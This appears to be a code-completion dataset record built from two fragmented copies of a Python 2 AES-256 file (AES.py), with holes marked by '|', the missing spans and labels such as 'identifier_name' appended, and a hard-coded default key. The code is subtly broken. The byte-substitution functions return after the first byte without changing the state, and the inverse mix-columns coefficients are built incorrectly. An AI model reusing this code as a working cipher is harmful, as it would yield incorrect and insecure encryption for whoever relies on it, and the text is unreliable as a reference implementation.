0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3,
0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4,
0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94,
0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8,
0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20,
0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d,
0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35,
0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91,
0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f,
0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d,
0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04,
0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c,
0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63,
0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa,
0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd,
0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66,
0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d]
SBOX = [
[0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76],
[0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0],
[0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15],
[0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75],
[0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84],
[0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf],
[0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8],
[0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2],
[0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73],
[0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb],
[0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79],
[0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08],
[0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a],
[0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e],
[0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf],
[0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16]
]
INVSBOX = [
[0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38, 0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb],
[0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87, 0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb],
[0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d, 0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e],
[0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2, 0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25],
[0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92],
[0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda, 0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84],
[0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a, 0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06],
[0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02, 0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b],
[0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea, 0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73],
[0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85, 0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e],
[0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89, 0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b],
[0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20, 0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4],
[0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31, 0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f],
[0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d, 0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef],
[0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0, 0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61],
[0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26, 0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d]
]
plaintxt = "plaintext.txt"
encout = "encrypted.out"
enctxt = "encryptedtext.txt"
dectxt = "decryptedtext.txt"
default_key = "anunexaminedlifeisnotworthliving"
def encrypt(keyschedule):
# place to store state array
rstate = [[0 for i in xrange(0, 4)] for i in xrange(0, 4)]
bvfile = BitVector(filename=plaintxt)
enctxtout = open(enctxt, "w")
fout = open(encout, "wb")
while (bvfile.more_to_read):
bit_block = bvfile.read_bits_from_file(128)
bit_block.pad_from_right(128 - len(bit_block))
# init state array
for i in xrange(0, 4):
for j in xrange(0, 4):
sp = (i * 32) + (j * 8)
rstate[j][i] = bit_block[sp:sp + 8]
add_round_key(rstate, keyschedule[0:4])
for i in xrange(1, 14):
sub_bytes(rstate)
shift_rows(rstate)
mix_cols(rstate)
add_round_key(rstate, keyschedule[i*4:((i+1)*4)])
sub_bytes(rstate)
shift_rows(rstate)
add_round_key(rstate, keyschedule[56:60])
for i in xrange(0, 4):
for j in xrange(0, 4):
enctxtout.write(rstate[i][j].get_hex_string_from_bitvector())
rstate[i][j].write_to_file(fout)
fout.close()
enctxtout.close()
def sub_word(word, sbox):
newword = ''
for i in xrange(0, 32, 8):
[row, col] = word[i:i+8].divide_into_two()
row = row.int_val()
col = col.int_val()
newword += str(BitVector(intVal=sbox[row][col]))
return BitVector(bitstring=newword)
def sub_bytes(state):
for i in xrange(0, 4):
for j in xrange(0, 4):
[row, col] = state[i][j].divide_into_two()
row = row.int_val()
col = col.int_val()
return BitVector(intVal=SBOX[row][col])
def shift_rows(state):
for i in xrange(1, 4): # to select row
state[i] = state[i][i:4] + state[i][0:i]
def mix_cols(state):
mod = BitVector(bitstring='100011011')
bv2 = BitVector(hexstring='2')
bv3 = BitVector(hexstring='3')
for j in xrange(0, 4): # to select col
s0 = state[0][j]
s1 = state[1][j]
s2 = state[2][j]
s3 = state[3][j]
sp0 = bv2.gf_multiply_modular(s0, mod, 8) ^ bv3.gf_multiply_modular(s1, mod, 8) ^ s2 ^ s3
sp1 = s0 ^ bv2.gf_multiply_modular(s1, mod, 8) ^ bv3.gf_multiply_modular(s2, mod, 8) ^ s3
sp2 = s0 ^ s1 ^ bv2.gf_multiply_modular(s2, mod, 8) ^ bv3.gf_multiply_modular(s3, mod, 8)
sp3 = bv3.gf_multiply_modular(s0, mod, 8) ^ s1 ^ s2 ^ bv2.gf_multiply_modular(s3, mod, 8)
state[0][j] = sp0
state[1][j] = sp1
state[2][j] = sp2
state[3][j] = sp3
def rot_word(word):
return word[8:32] + word[0:8]
def add_round_key(state, word):
for j in xrange(0, 4):
state[0][j] ^= word[j][0:8]
state[1][j] ^= word[j][8:16]
state[2][j] ^= word[j][16:24]
state[3][j] ^= word[j][24:32]
def key_expansion(key):
w = [0 for i in xrange(0, 64)]
for i in xrange(0, 8):
w[i] = BitVector(textstring=key[(i*4):(i*4+4)])
i = 8
while i < 60:
temp = w[i-1]
if (i % 8 == 0):
temp = sub_word((rot_word(temp)) ^ BitVector(intVal=RCON[i//8]), SBOX)
elif (i % 8 == 4):
temp = sub_word(temp, SBOX)
w[i] = w[i-8] ^ temp
i = i + 1
return w
def decrypt(keyschedule):
# place to store state array
rstate = [[0 for i in xrange(0, 4)] for i in xrange(0, 4)]
bvfile = BitVector(filename=encout)
fout = open(dectxt, "w")
while (bvfile.more_to_read):
bit_block = bvfile.read_bits_from_file(128)
bit_block.pad_from_right(128 - len(bit_block))
# init state array
for i in xrange(0, 4):
for j in xrange(0, 4):
sp = (i * 32) + (j * 8)
rstate[j][i] = bit_block[sp:sp + 8]
add_round_key(rstate, keyschedule[56:60])
for i in xrange(1, 14):
invshift_rows(rstate)
invsub_bytes(rstate)
add_round_key(rstate, keyschedule[i*4:((i+1)*4)])
invmix_cols(rstate)
invshift_rows(rstate)
invsub_bytes(rstate)
add_round_key(rstate, keyschedule[0:4])
for i in xrange(0, 4):
for j in xrange(0, 4):
rstate[i][j].write_to_file(fout)
fout.close()
def invsub_bytes(state):
for i in xrange(0, 4):
for j in xrange(0, 4):
[row, col] = state[i][j].divide_into_two()
row = row.int_val()
col = col.int_val()
return BitVector(intVal=INVSBOX[row][col])
def invshift_rows(state):
for i in xrange(1, 4): # to select row
state[i] = state[i][-i:] + state[i][:-i]
def | (state):
mod = BitVector(bitstring='100011011')
brw0 = [BitVector(hexstring='0e'),
BitVector(hexstring='0b'),
BitVector(hexstring='0d'),
BitVector(hexstring='09')]
brw1 = [brw0[3]] + brw0[1:4]
brw2 = [brw1[3]] + brw1[1:4]
brw3 = [brw2[3]] + brw2[1:4]
for j in xrange(0, 4): # to select col
s =[state[0][j],
state[1][j],
state[2][j],
state[3][j]]
sp0 = reduce(lambda x, y: x^y, [brw0[i].gf_multiply_modular(s[i], mod, 8) for i in xrange(0, 4)])
sp1 = reduce(lambda x, y: x^y, [brw1[i].gf_multiply_modular(s[i], mod, 8) for i in xrange(0, 4)])
sp2 = reduce(lambda x, y: x^y, [brw2[i].gf_multiply_modular(s[i], mod, 8) for i in xrange(0, 4)])
sp3 = reduce(lambda x, y: x^y, [brw3[i].gf_multiply_modular(s[i], mod, 8) for i in xrange(0, 4)])
state[0][j] = sp0
state[1][j] = sp1
state[2][j] = sp2
state[3][j] = sp3
def main():
#key = raw_input("Please enter the key (or empty to use default key):\n")
#if not key:
key = default_key
keyschedule = key_expansion(key)
encrypt(keyschedule)
decrypt(keyschedule)
if __name__ == "__main__":
main()
| invmix_cols | identifier_name |
AES.py | #! /usr/bin/env python
from BitVector import BitVector
RCON = [
0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40,
0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a,
0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a,
0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39,
0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25,
0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a,
0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08,
0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8,
0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6,
0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef,
0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61,
0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc,
0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01,
0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b,
0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e,
0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3,
0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4,
0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94,
0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8,
0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20,
0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d,
0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35,
0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91,
0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f,
0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d,
0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04,
0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c,
0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63,
0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa,
0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd,
0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66,
0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d]
SBOX = [
[0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76],
[0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0],
[0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15],
[0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75],
[0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84],
[0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf],
[0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8],
[0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2],
[0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73],
[0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb],
[0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79],
[0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08],
[0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a],
[0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e],
[0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf],
[0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16]
]
INVSBOX = [
[0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38, 0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb],
[0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87, 0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb],
[0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d, 0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e],
[0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2, 0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25],
[0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92],
[0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda, 0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84],
[0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a, 0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06],
[0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02, 0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b],
[0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea, 0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73],
[0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85, 0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e],
[0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89, 0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b],
[0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20, 0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4],
[0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31, 0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f],
[0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d, 0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef],
[0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0, 0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61],
[0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26, 0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d]
]
plaintxt = "plaintext.txt"
encout = "encrypted.out"
enctxt = "encryptedtext.txt"
dectxt = "decryptedtext.txt"
default_key = "anunexaminedlifeisnotworthliving"
def encrypt(keyschedule):
# place to store state array
rstate = [[0 for i in xrange(0, 4)] for i in xrange(0, 4)]
bvfile = BitVector(filename=plaintxt)
enctxtout = open(enctxt, "w")
fout = open(encout, "wb")
while (bvfile.more_to_read):
bit_block = bvfile.read_bits_from_file(128)
bit_block.pad_from_right(128 - len(bit_block))
# init state array
for i in xrange(0, 4):
for j in xrange(0, 4):
sp = (i * 32) + (j * 8)
rstate[j][i] = bit_block[sp:sp + 8]
add_round_key(rstate, keyschedule[0:4])
for i in xrange(1, 14):
sub_bytes(rstate)
shift_rows(rstate)
mix_cols(rstate)
add_round_key(rstate, keyschedule[i*4:((i+1)*4)])
sub_bytes(rstate)
shift_rows(rstate)
add_round_key(rstate, keyschedule[56:60])
for i in xrange(0, 4):
|
fout.close()
enctxtout.close()
def sub_word(word, sbox):
newword = ''
for i in xrange(0, 32, 8):
[row, col] = word[i:i+8].divide_into_two()
row = row.int_val()
col = col.int_val()
newword += str(BitVector(intVal=sbox[row][col]))
return BitVector(bitstring=newword)
def sub_bytes(state):
for i in xrange(0, 4):
for j in xrange(0, 4):
[row, col] = state[i][j].divide_into_two()
row = row.int_val()
col = col.int_val()
return BitVector(intVal=SBOX[row][col])
def shift_rows(state):
for i in xrange(1, 4): # to select row
state[i] = state[i][i:4] + state[i][0:i]
def mix_cols(state):
mod = BitVector(bitstring='100011011')
bv2 = BitVector(hexstring='2')
bv3 = BitVector(hexstring='3')
for j in xrange(0, 4): # to select col
s0 = state[0][j]
s1 = state[1][j]
s2 = state[2][j]
s3 = state[3][j]
sp0 = bv2.gf_multiply_modular(s0, mod, 8) ^ bv3.gf_multiply_modular(s1, mod, 8) ^ s2 ^ s3
sp1 = s0 ^ bv2.gf_multiply_modular(s1, mod, 8) ^ bv3.gf_multiply_modular(s2, mod, 8) ^ s3
sp2 = s0 ^ s1 ^ bv2.gf_multiply_modular(s2, mod, 8) ^ bv3.gf_multiply_modular(s3, mod, 8)
sp3 = bv3.gf_multiply_modular(s0, mod, 8) ^ s1 ^ s2 ^ bv2.gf_multiply_modular(s3, mod, 8)
state[0][j] = sp0
state[1][j] = sp1
state[2][j] = sp2
state[3][j] = sp3
def rot_word(word):
return word[8:32] + word[0:8]
def add_round_key(state, word):
for j in xrange(0, 4):
state[0][j] ^= word[j][0:8]
state[1][j] ^= word[j][8:16]
state[2][j] ^= word[j][16:24]
state[3][j] ^= word[j][24:32]
def key_expansion(key):
w = [0 for i in xrange(0, 64)]
for i in xrange(0, 8):
w[i] = BitVector(textstring=key[(i*4):(i*4+4)])
i = 8
while i < 60:
temp = w[i-1]
if (i % 8 == 0):
temp = sub_word((rot_word(temp)) ^ BitVector(intVal=RCON[i//8]), SBOX)
elif (i % 8 == 4):
temp = sub_word(temp, SBOX)
w[i] = w[i-8] ^ temp
i = i + 1
return w
def decrypt(keyschedule):
# place to store state array
rstate = [[0 for i in xrange(0, 4)] for i in xrange(0, 4)]
bvfile = BitVector(filename=encout)
fout = open(dectxt, "w")
while (bvfile.more_to_read):
bit_block = bvfile.read_bits_from_file(128)
bit_block.pad_from_right(128 - len(bit_block))
# init state array
for i in xrange(0, 4):
for j in xrange(0, 4):
sp = (i * 32) + (j * 8)
rstate[j][i] = bit_block[sp:sp + 8]
add_round_key(rstate, keyschedule[56:60])
for i in xrange(1, 14):
invshift_rows(rstate)
invsub_bytes(rstate)
add_round_key(rstate, keyschedule[i*4:((i+1)*4)])
invmix_cols(rstate)
invshift_rows(rstate)
invsub_bytes(rstate)
add_round_key(rstate, keyschedule[0:4])
for i in xrange(0, 4):
for j in xrange(0, 4):
rstate[i][j].write_to_file(fout)
fout.close()
def invsub_bytes(state):
for i in xrange(0, 4):
for j in xrange(0, 4):
[row, col] = state[i][j].divide_into_two()
row = row.int_val()
col = col.int_val()
return BitVector(intVal=INVSBOX[row][col])
def invshift_rows(state):
for i in xrange(1, 4): # to select row
state[i] = state[i][-i:] + state[i][:-i]
def invmix_cols(state):
mod = BitVector(bitstring='100011011')
brw0 = [BitVector(hexstring='0e'),
BitVector(hexstring='0b'),
BitVector(hexstring='0d'),
BitVector(hexstring='09')]
brw1 = [brw0[3]] + brw0[1:4]
brw2 = [brw1[3]] + brw1[1:4]
brw3 = [brw2[3]] + brw2[1:4]
for j in xrange(0, 4): # to select col
s =[state[0][j],
state[1][j],
state[2][j],
state[3][j]]
sp0 = reduce(lambda x, y: x^y, [brw0[i].gf_multiply_modular(s[i], mod, 8) for i in xrange(0, 4)])
sp1 = reduce(lambda x, y: x^y, [brw1[i].gf_multiply_modular(s[i], mod, 8) for i in xrange(0, 4)])
sp2 = reduce(lambda x, y: x^y, [brw2[i].gf_multiply_modular(s[i], mod, 8) for i in xrange(0, 4)])
sp3 = reduce(lambda x, y: x^y, [brw3[i].gf_multiply_modular(s[i], mod, 8) for i in xrange(0, 4)])
state[0][j] = sp0
state[1][j] = sp1
state[2][j] = sp2
state[3][j] = sp3
def main():
#key = raw_input("Please enter the key (or empty to use default key):\n")
#if not key:
key = default_key
keyschedule = key_expansion(key)
encrypt(keyschedule)
decrypt(keyschedule)
if __name__ == "__main__":
main()
| for j in xrange(0, 4):
enctxtout.write(rstate[i][j].get_hex_string_from_bitvector())
rstate[i][j].write_to_file(fout) | conditional_block |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.